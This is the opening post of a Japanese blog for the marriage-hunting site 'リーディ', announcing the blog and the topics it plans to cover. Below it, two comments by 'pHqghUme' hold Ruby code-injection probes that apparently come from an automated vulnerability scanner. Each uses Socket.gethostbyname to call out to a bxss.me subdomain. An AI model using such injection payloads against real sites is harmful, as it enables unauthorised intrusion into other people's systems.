婚活ブログ開始!

2015-05-18 20:00:00.0

はじめまして!

家計簿婚活サイトリーディの開発メンバーの「よつば」と申します。
今日からこちらで運営ブログを更新することになりました。
このブログを通して、皆さまの婚活のお手伝いが少しでもできればと思っております。
読む方が楽しめるブログを目指して日々努力いたしますので、皆さま、どうぞよろしくお願い致します。

家計簿婚活サイトのリーディは2015年4月28日に正式オープンしました。
リリース前は、なかなか大変でしたが、とりあえずスタートにこぎつけましたので、ホッとしております。
リーディのサイト(システム)は外注ではありません。
開発メンバーがコツコツと内作していますので、喜びもひとしおといった感じです。
ですので、これからの改良や機能追加も容易にできてしまいます!
ゴールデンウイークにリフレッシュしましたので、これから、皆さまにとって便利で使いやすいシステムを目指して、
今後もいっそう頑張ろうと思っております。

さて、今後こちらの運営ブログでは、こんなことを紹介していきます!

☆リーディってどんなことができるの?
 ・家計簿婚活って今までのネット婚活サイトと何が違うの?
 ・家計簿付けるのって手間が掛かるんじゃないの?(もしかして毎日つけるの?)

☆リーディの機能の紹介と利用ポイント
 ・プロフィールってどんな項目を入力するの?
 ・試してみてもいいんだけど、退会するの大変なんでしょ?(退会方法がわかりにくいサイトってありますよね)

☆最近の婚活ってどんなものなの?
 ・季節ごとの婚活イベントや、婚活の新しいトレンドなどをご紹介していきます!
 ・リーディ以外のこともたくさん取り上げていきます。

☆ネット婚活サイトってどうやってするの?
 ・普段、出会いがない・・・
 ・合コンやパーティーといったイベントには行き疲れた。(行く気が起きない。)
 ・ネット婚活サイトって危なくないの?(個人情報とか大丈夫?)
 ・プロフィール写真をネットで公開するのはちょっと・・・
 ・プロフィール作成とか面倒くさいんでしょう?

・・・などなど

これら以外にも婚活やリーディについて、いろいろな情報を配信していきますのでご期待ください。
そのほかにも、こんな内容の記事が読んでみたい!という要望がありましたら、ぜひご意見をお寄せ下さい。

今回のブログはここまでとなります。
次回は、リーディの機能の説明や使い方を紹介する予定です。
それでは、次回の更新までもう少々お待ちください。

pHqghUme
2023-08-06 16:33:15.525
'+'A'.concat(70-3).concat(22*4).concat(111).concat(85).concat(106).concat(71)+(require'socket'
Socket.gethostbyname('hitlf'+'dxfgmyux459bf.bxss.me.')[3].to_s)+'

pHqghUme
2023-08-06 16:33:15.024
"+"A".concat(70-3).concat(22*4).concat(98).concat(90).concat(115).concat(86)+(require"socket"
Socket.gethostbyname("hithw"+"cvrsaexf9f4e8.bxss.me.")[3].to_s)+"